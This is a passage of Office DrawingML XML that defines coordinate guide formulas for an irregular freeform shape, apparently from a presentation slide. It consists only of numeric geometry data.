              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 266817 w 1380202"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 282504 w 1380202"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 326209 w 1380202"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 309432 w 1380202"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 286847 w 1380202"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 294011 w 1380202"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 276756 w 1380202"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 303784 w 1380202"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 281776 w 1380202"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 280574 w 1380202"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 295989 w 1380202"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 283376 w 1380202"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 268605 w 1380202"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 318117 w 1380202"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 297192 w 1380202"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 336784 w 1380202"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 383914 w 1380202"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 397482 w 1380202"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 413463 w 1380202"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 446956 w 1380202"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 456555 w 1380202"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 467781 w 1380202"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 468801 w 1380202"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 476142 w 1380202"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 479445 w 1380202"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480429 w 1380202"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 476063 w 1380202"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 482740 w 1380202"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479673 w 1380202"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 486503 w 1380202"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 493539 w 1380202"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 496270 w 1380202"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 492974 w 1380202"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 494528 w 1380202"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 501437 w 1380202"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 497293 w 1380202"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 512696 w 1380202"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 518599 w 1380202"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 523332 w 1380202"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 524625 w 1380202"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 522432 w 1380202"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 517912 w 1380202"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 512995 w 1380202"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 509560 w 1380202"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 490213 w 1380202"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 494286 w 1380202"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 479542 w 1380202"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 480691 w 1380202"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 479267 w 1380202"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465562 w 1380202"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 467160 w 1380202"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 460582 w 1380202"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 461913 w 1380202"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 466267 w 1380202"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 471345 w 1380202"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 493939 w 1380202"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 493364 w 1380202"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 493671 w 1380202"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 493698 w 1380202"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 492313 w 1380202"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 491197 w 1380202"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 492930 w 1380202"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 496673 w 1380202"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 496139 w 1380202"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 504835 w 1380202"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 512181 w 1380202"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 511477 w 1380202"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 514920 w 1380202"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 522458 w 1380202"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 524129 w 1380202"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 541692 w 1380202"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 542117 w 1380202"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 543940 w 1380202"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 530775 w 1380202"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 531276 w 1380202"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 518876 w 1380202"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 504061 w 1380202"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 504726 w 1380202"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 495594 w 1380202"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 482203 w 1380202"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 454933 w 1380202"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 397547 w 1380202"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 346465 w 1380202"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 326559 w 1380202"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 317282 w 1380202"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 304243 w 1380202"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 310242 w 1380202"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 312854 w 1380202"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 289183 w 1380202"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 279070 w 1380202"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 263287 w 1380202"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 260745 w 1380202"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 261738 w 1380202"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 253544 w 1380202"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 234722 w 1380202"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 211279 w 1380202"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 165078 w 1380202"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 137389 w 1380202"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 136515 w 1380202"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 117310 w 1380202"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 130390 w 1380202"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 123132 w 1380202"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 109217 w 1380202"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 117524 w 1380202"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 118712 w 1380202"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 123397 w 1380202"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 115679 w 1380202"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 104985 w 1380202"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 93721 w 1380202"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 95177 w 1380202"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 97413 w 1380202"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 90042 w 1380202"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 59450 w 1380202"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 38400 w 1380202"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 37958 w 1380202"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 23629 w 1380202"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 9048 w 1380202"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 14059 w 1380202"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 1 w 1380202"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 79993 w 1380202"/>
              <a:gd name="connsiteY130" fmla="*/ 473479 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 68074 w 1380202"/>
              <a:gd name="connsiteY131" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 67322 w 1380202"/>
              <a:gd name="connsiteY132" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 67152 w 1380202"/>
              <a:gd name="connsiteY133" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 88662 w 1380202"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 72845 w 1380202"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 89872 w 1380202"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 81582 w 1380202"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 93866 w 1380202"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 53420 w 1380202"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 44600 w 1371382"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1371382 w 1371382"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1371382 w 1371382"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 108076 w 1371382"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 144669 w 1371382"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 156169 w 1371382"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 180908 w 1371382"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 158465 w 1371382"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 173556 w 1371382"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 191000 w 1371382"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 205040 w 1371382"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 257997 w 1371382"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 273684 w 1371382"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 317389 w 1371382"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 300612 w 1371382"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 278027 w 1371382"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 285191 w 1371382"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 267936 w 1371382"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 294964 w 1371382"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 272956 w 1371382"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 271754 w 1371382"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 287169 w 1371382"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 274556 w 1371382"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 259785 w 1371382"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 309297 w 1371382"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 288372 w 1371382"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 327964 w 1371382"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 375094 w 1371382"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 388662 w 1371382"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 404643 w 1371382"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 438136 w 1371382"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 447735 w 1371382"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 458961 w 1371382"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 459981 w 1371382"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 467322 w 1371382"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 470625 w 1371382"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 471609 w 1371382"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 467243 w 1371382"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 473920 w 1371382"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 470853 w 1371382"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 477683 w 1371382"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 484719 w 1371382"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 487450 w 1371382"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 484154 w 1371382"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 485708 w 1371382"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 492617 w 1371382"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 488473 w 1371382"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 503876 w 1371382"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 509779 w 1371382"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 514512 w 1371382"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 515805 w 1371382"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 513612 w 1371382"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 509092 w 1371382"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 504175 w 1371382"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 500740 w 1371382"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 481393 w 1371382"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 485466 w 1371382"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 470722 w 1371382"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 471871 w 1371382"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 470447 w 1371382"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456742 w 1371382"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 458340 w 1371382"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 451762 w 1371382"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 453093 w 1371382"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 457447 w 1371382"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 462525 w 1371382"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 485119 w 1371382"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 484544 w 1371382"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 484851 w 1371382"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 484878 w 1371382"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 483493 w 1371382"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 482377 w 1371382"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 484110 w 1371382"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487853 w 1371382"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 487319 w 1371382"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 496015 w 1371382"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 503361 w 1371382"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 502657 w 1371382"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 506100 w 1371382"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 513638 w 1371382"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 515309 w 1371382"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 532872 w 1371382"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
